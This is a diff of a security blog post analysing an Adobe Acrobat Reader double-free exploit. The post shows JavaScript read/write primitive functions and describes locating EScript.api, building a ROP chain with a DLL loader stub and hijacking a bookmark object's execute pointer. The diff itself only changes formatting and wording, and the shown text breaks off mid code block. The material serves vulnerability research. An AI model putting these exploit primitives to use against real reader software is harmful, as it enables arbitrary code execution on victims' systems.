sourceincite/sourceincite.github.io/_posts/2018-05-21-adobe-me-and-a-double-free.md

 ```
 function myread(addr){
-    mydv.setUint32(mypos,addr,true);
+    mydv.setUint32(mypos, addr, true);
     var res = myarray[0];
-    mydv.setUint32(mypos,myarraybase,true);
+    mydv.setUint32(mypos, myarraybase, true);
     return res;
 }

-function mywrite(addr,value){
+function mywrite(addr, value){
-    mydv.setUint32(mypos,addr,true);
+    mydv.setUint32(mypos, addr, true);
-    myarray[0] = value ;
+    myarray[0] = value;
-    mydv.setUint32(mypos,myarraybase,true);
+    mydv.setUint32(mypos, myarraybase, true);
 }
 ```
 <p class="cn" markdown="1">Naturally, they use some helper functions to use the new read/write primitive.
 At this point it's game over.
 They could have gone with a data only attack but there is no need since Acrobat Reader has no Control Flow Guard (CFG) so they opted for the traditional call gate control flow.
-First they located the EScript.api and got the dll base address, then they built a rop chain with a dll loader stub, overwrote the bookmark object's execute function pointer to finally redirect execution flow.</p>
+First they located the EScript.api and got the dll base address, then they built a rop chain with a dll loader stub, stored it all in the `myarray` Array overwrote the bookmark object's execute function pointer with the base address of `myarray` to finally redirect execution flow.</p>

 ```
 var bkm = this.bookmarkRoot;